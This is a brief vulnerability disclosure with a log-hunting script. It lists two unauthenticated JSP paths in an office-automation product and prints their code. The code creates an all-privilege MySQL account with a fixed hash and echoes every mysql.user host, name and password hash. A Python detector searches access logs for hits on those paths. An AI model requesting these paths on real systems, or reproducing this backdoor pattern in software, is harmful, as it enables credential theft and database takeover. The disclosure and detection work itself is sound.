<p>This vulnerability leaks the database users' account names and password hashes.</p>
<pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">/yyoa/createMysql.jsp
/yyoa/ext/createMysql.jsp</code></pre>
<p>The code of this file is:</p>
<pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">&lt;%@ page language="java" %&gt;
&lt;%@ page session="true" %&gt;
&lt;%@ page isThreadSafe="true" %&gt;
&lt;%@ page import="java.sql.*,net.btdz.oa.common.*" %&gt;
&lt;%
// Recreate the 'cubetech' MySQL account with a fixed password hash and 'Y' in every privilege column.
CommonSql.exeUpdate("DELETE FROM mysql.user WHERE User = 'cubetech' ");
CommonSql.exeUpdate("INSERT INTO mysql.user VALUES ('localhost','cubetech','*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0,0);");
ResultSet rs = null;
// Read every row of mysql.user; nothing in this page checks who is making the request.
rs = CommonSql.exeQuery("Select * from mysql.user;");
while(rs.next()){
    // Columns 1-3 are written into the response (host, user and password hash, matching the INSERT above).
    out.println(rs.getString(1)+"&lt;/br&gt;");
    out.println(rs.getString(2)+"&lt;/br&gt;");
    out.println(rs.getString(3)+"&lt;/br&gt;");
}
%&gt;</code></pre>
<p>It directly executes Select * from mysql.user; and echoes the result.</p>
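<p>To check whether either page has already been requested on a deployment, the web access log can be searched for the two paths above. The following is an added example, not part of the original report or the vendor's code: it assumes Common/Combined Log Format, and the function names and sample log lines are constructed for illustration.</p>

```python
import posixpath
import re
from urllib.parse import unquote

# The two paths named in the report, lower-cased for comparison.
EXPOSED = {"/yyoa/createmysql.jsp", "/yyoa/ext/createmysql.jsp"}

# Common/Combined Log Format: ip ident user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')

def normalize(target):
    """Reduce a request target to the path the container would map to a file."""
    path = unquote(target.split("?", 1)[0])      # drop the query, decode %xx
    # Drop path parameters such as ;jsessionid=... from every segment.
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = re.sub(r"/+", "/", path)              # collapse repeated slashes
    # Resolve /./ and /../. Lower-casing over-matches on case-sensitive hosts,
    # which is acceptable for a log hunt (assumption).
    return posixpath.normpath(path).lower()

def find_hits(lines):
    """Return one record per logged request that reached either exposed page."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                             # not an access-log line
        ip, when, target, status = m.groups()
        if normalize(target) in EXPOSED:
            # A 200 suggests the JSP ran and mysql.user rows went to the client.
            hits.append({"ip": ip, "time": when, "target": target,
                         "served": status == "200"})
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /yyoa/index.jsp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /yyoa/createMysql.jsp HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /yyoa//ext/./createMysql.jsp;x=1?a=b HTTP/1.1" 200 812',
    '203.0.113.4 - - [01/Jan/2024:10:02:00 +0000] "GET /yyoa/ext/createmysql.jsp HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

<p>Any record with served set to True means the account names and password hashes in mysql.user should be treated as disclosed; the cubetech account inserted by the page carries a fixed hash and should be reviewed as well.</p>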